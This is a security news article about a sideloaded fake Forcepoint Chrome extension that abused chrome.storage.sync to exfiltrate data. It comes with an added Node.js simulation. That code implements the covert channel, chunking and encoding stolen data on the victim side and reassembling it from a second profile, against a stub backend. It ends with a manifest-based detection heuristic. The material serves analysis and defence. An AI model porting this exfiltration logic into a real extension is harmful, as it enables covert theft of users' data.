
Fake Forcepoint Google Chrome Extension Hacks Windows Users
2021-02-08 17:24

Cybercriminals have been using a novel approach to exfiltrate data: a malicious Google Chrome extension is loaded directly onto the victim's Windows machine, and Chrome's cloud syncing function is then abused to carry the stolen data out of the network.

The malicious add-on is disguised as a "Forcepoint Endpoint Chrome Extension for Windows," with the attackers using the security company's logo to lend it an air of legitimacy.

The threat actors "dropped the extension locally in a folder and loaded it directly from Chrome on a compromised workstation," explained Bojan Zdrnja of the SANS Internet Storm Center in an analysis late last week.

In the extension's manifest, the permissions parameter specifies that the extension can use the storage API, and the background parameter specifies the JavaScript files that run when the extension is loaded.

The authors of the malicious Forcepoint add-on were able to steal information by setting up a behind-the-scenes "chat" between the malicious extension and web apps running in the browser, which hand their data to the extension's background script.

The extension also uses the chrome.storage.sync.get and chrome.storage.sync.set methods, so that every value it stores is automatically synced to Google's cloud by Chrome in the context of the Google account the user is signed into in Chrome. Anyone who signs a second Chrome profile into that same account and loads the same extension can read the values back, which turns Google's sync infrastructure into an exfiltration and command-and-control channel that ordinary egress filtering will not catch.
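The following is an added example, not code from the SANS analysis or the Threatpost article, simulating the chrome.storage.sync channel described above in Node.js. Because chrome.* APIs do not exist outside the browser, an in-memory stub stands in for Google's sync backend; the three quota constants are Chrome's documented limits for chrome.storage.sync, while the key names, message format, chunk size, sample manifest and the manifest-triage heuristic are assumptions made for this example. It shows the victim side (chunking data under the per-item quota before set), the attacker side (get from a second profile on the same account), and a defender-side check over manifest.json.

```javascript
// Added example (not the extension's own code): simulation of the
// chrome.storage.sync exfiltration channel. The quota values are Chrome's
// documented limits; everything else here is an assumption for illustration.
const QUOTA_BYTES_PER_ITEM = 8192;  // key length + JSON.stringify(value).length
const QUOTA_BYTES = 102400;         // sum over all stored items
const MAX_ITEMS = 512;

// Constructed stand-in for the sync backend: one map shared by every Chrome
// profile signed into the same Google account.
function makeSyncBackend() { return new Map(); }
function itemSize(key, value) { return key.length + JSON.stringify(value).length; }

class FakeChromeStorageSync {
  constructor(backend) { this.backend = backend; }
  // Mirrors chrome.storage.sync.set(): the whole write fails if any quota breaks.
  async set(items) {
    const next = new Map(this.backend);
    for (const [k, v] of Object.entries(items)) {
      if (itemSize(k, v) > QUOTA_BYTES_PER_ITEM) throw new Error(`QUOTA_BYTES_PER_ITEM exceeded: ${k}`);
      next.set(k, v);
    }
    let total = 0;
    for (const [k, v] of next) total += itemSize(k, v);
    if (next.size > MAX_ITEMS) throw new Error('MAX_ITEMS exceeded');
    if (total > QUOTA_BYTES) throw new Error('QUOTA_BYTES exceeded');
    for (const [k, v] of next) this.backend.set(k, v);
  }
  // Mirrors chrome.storage.sync.get(keys) for an array of keys.
  async get(keys) {
    const out = {};
    for (const k of keys) if (this.backend.has(k)) out[k] = this.backend.get(k);
    return out;
  }
}

// Victim side: the background script base64-encodes what a page handed it and
// splits it into chunks that pass the per-item quota (a single set() of a large
// value would be rejected outright).
const CHUNK_CHARS = 6000;  // assumed chunk size; leaves headroom for key and quotes

async function exfiltrate(sync, tag, data) {
  const encoded = Buffer.from(data, 'utf8').toString('base64');
  const items = {};
  let n = 0;
  for (let i = 0; i < encoded.length; i += CHUNK_CHARS, n++) {
    items[`${tag}_${n}`] = encoded.slice(i, i + CHUNK_CHARS);
  }
  items[`${tag}_count`] = n;
  await sync.set(items);
  return n;
}

// Assumed shape of the page-to-extension "chat" message; in a real extension
// chrome.runtime.onMessage would deliver it to the background script.
async function handleMessage(sync, msg) {
  if (msg && msg.type === 'exfil' && typeof msg.data === 'string') {
    return exfiltrate(sync, msg.tag || 'exfil', msg.data);
  }
  return 0;
}

// Attacker side: a second Chrome profile signed into the same Google account,
// with the same extension loaded, reads the synced values and reassembles them.
async function collect(sync, tag) {
  const countKey = `${tag}_count`;
  const { [countKey]: n } = await sync.get([countKey]);
  if (n === undefined) return null;
  const keys = Array.from({ length: n }, (_, i) => `${tag}_${i}`);
  const parts = await sync.get(keys);
  return Buffer.from(keys.map(k => parts[k]).join(''), 'base64').toString('utf8');
}

// Defender side: triage heuristic over manifest.json for the combination seen
// here: storage permission, background code, and no update_url (Web Store
// installs carry one; unpacked/sideloaded extensions usually do not).
function suspiciousSyncChannel(manifest) {
  const perms = manifest.permissions || [];
  const bg = manifest.background || {};
  const hasBackground = (Array.isArray(bg.scripts) && bg.scripts.length > 0)
    || typeof bg.service_worker === 'string';
  return perms.includes('storage') && hasBackground && !manifest.update_url;
}

// Constructed manifest matching the article's description of the extension.
const SAMPLE_MANIFEST = {
  name: 'Forcepoint Endpoint Chrome Extension for Windows',
  manifest_version: 2,
  version: '1.0',
  permissions: ['storage'],
  background: { scripts: ['background.js'] },
};

async function demo() {
  const backend = makeSyncBackend();
  const victimChrome = new FakeChromeStorageSync(backend);
  const attackerChrome = new FakeChromeStorageSync(backend);
  const secret = 'x'.repeat(20000);  // constructed payload, well over the per-item quota
  const chunks = await handleMessage(victimChrome, { type: 'exfil', tag: 'exfil', data: secret });
  const recovered = await collect(attackerChrome, 'exfil');
  return { chunks, recoveredOk: recovered === secret, flagged: suspiciousSyncChannel(SAMPLE_MANIFEST) };
}

demo().then(r => console.log(r));
```

The per-item quota is the practical caveat: data has to be chunked (and, on a real network, staged across several writes) to fit, which is also why unusual numbers of small chrome.storage.sync writes from an extension that has no business syncing anything are worth alerting on. The manifest heuristic is only a triage aid; legitimate unpacked extensions in development trip it too, so treat a hit as a prompt to read background.js rather than as a verdict.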


News URL

https://threatpost.com/fake-forcepoint-google-chrome-extension-hacks/163728/

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Google 141 994 4922 2872 1623 10411
Forcepoint 12 2 12 4 2 20